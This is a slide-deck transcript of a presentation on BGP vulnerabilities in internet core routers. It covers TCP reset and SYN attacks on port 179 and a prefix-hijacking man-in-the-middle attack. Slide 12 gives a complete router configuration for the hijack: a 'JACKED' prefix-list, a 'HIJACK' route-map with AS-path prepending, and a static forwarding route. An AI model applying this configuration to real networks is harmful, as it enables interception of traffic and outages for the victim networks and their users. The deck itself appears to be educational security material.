Top Banner
TIME TO SHUTDOWN INTERNET CORE ROUTER HTTP://IPSECS.COM
17
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: BGP Vulnerability

TIME TO SHUTDOWNINTERNET CORE ROUTER

HTTP://IPSECS.COM

Page 2: BGP Vulnerability

COMMUNICATION

Analog communication Digital communication Analog communication to

digital communication convergence

Internet Protocol

Page 3: BGP Vulnerability

FUTURE COMMUNICATION

IP based communication will become the core communication?

Scalability and reliability communication infrastructure?

Vulnerability and security threat?

Page 4: BGP Vulnerability

CORE COMMUNICATION

Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway 

Protocol (BGP) now

Page 5: BGP Vulnerability

BGP VULNERABILITY

BGP messages TCP vulnerability BGP internet man in the

middle Documented on RFC 4272

Page 6: BGP Vulnerability

BGP MESSAGES

BGP states? idle, connect, active, opensent, openconfirm, established

BGP message? open, update, notification, keep alive

BGP message modification to poison routing table and Denial of Service

Complex and nearly impractical

Page 7: BGP Vulnerability
Page 8: BGP Vulnerability

TCP VULNERABILITY

BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle

Page 9: BGP Vulnerability
Page 10: BGP Vulnerability

BGP MAN IN THE MIDDLE More specific network prefix wins Use tracroute to identify routing

from source to destination Use route-map and AS-PATH

prepending Static routing to give information

about next-hop-router

Page 11: BGP Vulnerability
Page 12: BGP Vulnerability

router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outneighbor 2.2.4.2 route­map HIJACK outneighbor 4.3.2.1 remote­as 10neighbor 4.3.2.1 prefix­list ANN outneighbor 5.4.3.1 remote­as 60neighbor 5.4.3.1 prefix­list JACKED outneighbor 5.4.3.1 route­map HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefix­list ANN seq 10 permit 2.2.4.0/24ip prefix­list ANN seq 15 permit 4.3.2.0/24ip prefix­list ANN seq 20 permit 5.4.3.0/24!ip prefix­list JACKED seq 10 permit 2.2.4.0/24ip prefix­list JACKED seq 15 permit 4.3.2.0/24ip prefix­list JACKED seq 20 permit 5.4.3.0/24ip prefix­list JACKED seq 25 permit 10.10.220.0/24route­map HIJACK permit 10set as­path prepend 10 20 200

Page 13: BGP Vulnerability
Page 14: BGP Vulnerability

SOME POLICIES

Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)

Page 15: BGP Vulnerability

DEMO BGP ATTACK

Page 16: BGP Vulnerability

QUESTION? ANSWER

Page 17: BGP Vulnerability

THANK YOU


Related Documents
BGP Techniques for Internet Service Providers...BGP Techniques for Internet Service Providers BGP Basics Scaling BGP Using Communities Deploying BGP in an ISP network The role of IGPs

BGP Techniques for Internet Service Providers...BGP...

Category: Documents
You’ve Got Vulnerability: Exploring Effective ... · You’ve Got Vulnerability: Exploring Effective Vulnerability Notifications ... pared to IPv4, including for BGP, DNS, FTP,

You’ve Got Vulnerability: Exploring Effective ... ·...

Category: Documents
BGP meets Big Data...BGP meets Big Data Monitoring BGP –Snapshot vs. History BGP Monitoring Protocol –RFC 7854 BMP collector BMP client Inbound policy BMPmessages BGP peers (external)

BGP meets Big Data...BGP meets Big Data Monitoring BGP...

Category: Documents
BGP Multihoming Techniques - University …nets.ucar.edu/nets/intro/staff/siemsen/hints/bgp/AfNOG2011-BGP...Case Study. AfNOG 2011 5 ... BGP Multihoming Techniques ... • failure

BGP Multihoming Techniques - University...

Category: Documents
REDES MPLS PROFESSOR: MARCOS A. A. GONDIM BGP. Roteiro Introdução ao BGP Sistema Autonômo Fundamentos do BGP Sessão BGP Cabeçalho BGP Mensagem BGP Tabelas.

REDES MPLS PROFESSOR: MARCOS A. A. GONDIM BGP. Roteiro...

Category: Documents
33 - Routing - BGP - Internal and External BGP

33 - Routing - BGP - Internal and External BGP

Category: Documents
BGP-TE APPLICATION LEVEL TOPOLOGY …...BGP Speaker BGP BGP Speaker Speaker IGP Router AS1 Prefix 1, 2, 3, … Prefix 11, 12, 13, … Prefix 21, 22, 23, … BGP Speaker Prefix 31,

BGP-TE APPLICATION LEVEL TOPOLOGY …...BGP Speaker BGP BGP....

Category: Documents
BGP Techniques for Internet Service Providers - MENOG · BGP Techniques for Internet Service Providers BGP Basics Scaling BGP Using Communities Deploying BGP in an ISP network. ...

BGP Techniques for Internet Service Providers - MENOG ·...

Category: Documents
BGP-RCN: improving BGP convergence through root cause ...

BGP-RCN: improving BGP convergence through root cause ...

Category: Documents
Implementing BGP Explaining BGP Concepts and Terminology.

Implementing BGP Explaining BGP Concepts and Terminology.

Category: Documents
BGP V1.1. When is BGP Applicable Basic BGP Peer Configuration Troubleshooting BGP Connections BGP Operation and Path Attributes Route Import/Export Selected.

BGP V1.1. When is BGP Applicable Basic BGP Peer...

Category: Documents
BGP & MPLS WALKTHROUGH - Amazon S3 · BGP & MPLS WALKTHROUGH 3 BGP CHAPTER 1 QUESTIONS: 1. What BGP ASNs Values? 2. What is iBGP & eBGP ? 3. How BGP form iBGP relationship ,which

BGP & MPLS WALKTHROUGH - Amazon S3 · BGP & MPLS...

Category: Documents